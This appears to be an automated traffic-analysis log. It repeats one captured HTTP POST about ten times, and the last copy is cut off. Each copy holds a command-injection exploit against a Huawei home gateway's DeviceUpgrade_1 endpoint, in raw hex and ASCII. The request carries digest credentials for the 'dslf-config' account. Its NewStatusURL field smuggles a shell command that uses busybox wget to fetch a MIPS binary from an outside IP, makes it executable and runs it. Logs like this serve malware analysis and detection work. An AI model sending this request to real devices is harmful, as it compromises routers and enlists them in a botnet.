Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 